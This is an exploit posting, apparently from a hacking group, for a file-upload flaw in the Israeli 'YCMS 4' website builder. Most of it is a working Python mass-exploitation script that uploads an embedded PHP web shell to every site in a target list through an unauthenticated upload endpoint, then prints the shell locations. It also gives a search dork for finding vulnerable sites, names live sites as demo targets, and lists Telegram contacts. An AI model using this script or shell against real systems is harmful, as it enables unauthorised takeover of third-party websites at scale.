[-] Title : israel YCMS 4 - Remote File Upload - CSRF / Shell Upload [-] Author : 1933 (TURK TM - SS CYBER) [-] Vendor : https://website.laki.co.il/ [-] Category : Webapps [-] Dork : intext:נבנה ע"י לק"י בניית אתרים [-] Date : 20/11/2023 [-] Demo Targets : 1-http://barak.ksite.co.il/ 2-https://website.laki.co.il/ 3-https://chanofan.com/ 4-http://www.radio-lev.co.il/ Exploit: import requests import re from colorama import * import os if os.name == 'nt': os.system('cls') else: os.system('clear') init() code_up = """ <!DOCTYPE html> <html> <head> <title>1933-SS</title> <style> body { background-color: black; text-align: center; } h1 { color: red; } .uploaded { color: green; } </style> </head> <body> <h1>1933-ss cyber team</h1> <form enctype='multipart/form-data' action='' method='POST'> <input type='file' name='uploaded_file'></input> <input type='submit' value='Upload'></input> </form> </body> </html> <?php if (!empty($_FILES['uploaded_file'])) { $upload_dir = './'; // Define the directory where you want to save the uploaded files $file_name = basename($_FILES['uploaded_file']['name']); $file_path = $upload_dir . $file_name; if (move_uploaded_file($_FILES['uploaded_file']['tmp_name'], $file_path)) { echo '<span class="uploaded">The file ' . $file_name . ' has been uploaded.</span>'; } else { echo '<h1>There was an error uploading the file, please try again.</h1>'; } } ?> """ banner = Fore.CYAN +""" _____ _____ _______ ______ ______ _____ _______ ______ __ __ / ____/ ____| / ____\ \ / | _ \| ____| __ \ |__ __| ____| /\ | \/ | | (___| (___ | | \ \_/ /| |_) | |__ | |__) | | | | |__ / \ | \ / | \___ \\\___ \ | | \ / | _ <| __| | _ / | | | __| / /\ \ | |\/| | ____) ____) | | |____ | | | |_) | |____| | \ \ | | | |____ / ____ \| | | | |_____|_____/ \_____| |_| |____/|______|_| \_\ |_| |______/_/ \_|_| |_| """ banner2 = "\nCoded by :" + Fore.RED +""" T.ME/D4LGH4CK_TM | T.ME/SS_CYBER_TEAM""" print(banner+banner2+Fore.WHITE) websites = input("\nwebsite list: ") websites = open(websites,"r").read().split("\n") for url in websites: try: value = "yadmin/apps/browser.php?op=gallery&CKEditor=page-content&CKEditorFuncNum=1&langCode=en" upload_url = url+'/yadmin/apps/browser.php?op=upload&type=other&id=*' uploader = {'upload-to-gallery[]': ('ss.php',code_up)} response = requests.post(upload_url, files=uploader , timeout=3) except: pass try: response = requests.get(url+value,timeout=10) if response.status_code == 200: match = re.search(r'/ss(\d+\.php)', response.text) if match: value = match.group(1) print(Fore.GREEN +url+f"uploads/other/ss{value}") else: print(Fore.RED+f"Request to {url} failed with status code {response.status_code}"+Fore.WHITE) except: continue ************************************************** - Telegram : @asad_turk0 - Tnx : RED KURD (@RED_AS_SOCITY) - Thanks to my dear friend "RED KURD" for help to discover the bug.